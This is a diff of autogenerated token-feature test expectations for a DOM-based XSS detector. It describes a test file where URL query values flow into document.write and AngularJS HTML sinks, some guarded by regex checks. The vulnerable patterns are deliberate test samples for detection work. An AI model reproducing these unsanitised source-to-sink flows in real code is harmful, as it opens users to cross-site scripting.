autogenerated/Xss/DomBasedXss/tst.js:136:3:136:19 | exceptional return of document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:136:3:136:19 | exceptional return of document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:136:12:136:16 | write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:136:12:136:16 | write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:136:12:136:16 | write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:136:12:136:16 | write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:136:12:136:16 | write | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:136:18:136:18 | v | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/tst.js:136:18:136:18 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:136:18:136:18 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16523,6 +114816,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:136:18:136:18 | v | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:136:18:136:18 | v | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:136:18:136:18 | v | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:138:7:138:24 | !(/^\\d+$/.test(v)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:138:7:138:24 | !(/^\\d+$/.test(v)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:138:7:138:24 | !(/^\\d+$/.test(v)) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:138:7:138:24 | !(/^\\d+$/.test(v)) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:138:7:138:24 | !(/^\\d+$/.test(v)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:138:8:138:24 | (/^\\d+$/.test(v)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:138:8:138:24 | (/^\\d+$/.test(v)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:138:8:138:24 | (/^\\d+$/.test(v)) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:138:8:138:24 | (/^\\d+$/.test(v)) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:138:8:138:24 | (/^\\d+$/.test(v)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:15 | /^\\d+$/ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:15 | /^\\d+$/ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:15 | /^\\d+$/ | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:15 | /^\\d+$/ | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:15 | /^\\d+$/ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:20 | /^\\d+$/.test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:20 | /^\\d+$/.test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:20 | /^\\d+$/.test | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:20 | /^\\d+$/.test | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:20 | /^\\d+$/.test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:23 | /^\\d+$/.test(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:23 | /^\\d+$/.test(v) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:23 | /^\\d+$/.test(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:23 | /^\\d+$/.test(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:23 | /^\\d+$/.test(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:23 | exceptional return of /^\\d+$/.test(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:23 | exceptional return of /^\\d+$/.test(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:23 | exceptional return of /^\\d+$/.test(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:23 | exceptional return of /^\\d+$/.test(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:138:9:138:23 | exceptional return of /^\\d+$/.test(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:138:17:138:20 | test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:138:17:138:20 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:138:17:138:20 | test | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:138:17:138:20 | test | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:138:17:138:20 | test | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:138:22:138:22 | v | CalleeFlexibleAccessPath | ?.test | | autogenerated/Xss/DomBasedXss/tst.js:138:22:138:22 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:138:22:138:22 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16530,6 +114858,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:138:22:138:22 | v | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | | autogenerated/Xss/DomBasedXss/tst.js:138:22:138:22 | v | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:138:22:138:22 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:10 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:10 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:10 | document | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:10 | document | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:10 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:16 | document.write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:16 | document.write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:16 | document.write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:16 | document.write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:16 | document.write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:19 | document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:19 | document.write(v) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:19 | document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:19 | document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:19 | document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:19 | exceptional return of document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:19 | exceptional return of document.write(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:19 | exceptional return of document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:19 | exceptional return of document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:142:3:142:19 | exceptional return of document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:142:12:142:16 | write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:142:12:142:16 | write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:142:12:142:16 | write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:142:12:142:16 | write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:142:12:142:16 | write | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:142:18:142:18 | v | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/tst.js:142:18:142:18 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:142:18:142:18 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16538,6 +114891,177 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:142:18:142:18 | v | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:142:18:142:18 | v | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:142:18:142:18 | v | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:145:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:145:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:145:0 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:145:0 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:145:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | 'arguments' object of function angularJSServices | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | 'arguments' object of function angularJSServices | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | 'arguments' object of function angularJSServices | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | 'arguments' object of function angularJSServices | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | 'arguments' object of function angularJSServices | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | exceptional return of function angularJSServices | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | exceptional return of function angularJSServices | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | exceptional return of function angularJSServices | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | exceptional return of function angularJSServices | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | exceptional return of function angularJSServices | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | functio ... })\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | functio ... })\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | functio ... })\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | return of function angularJSServices | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 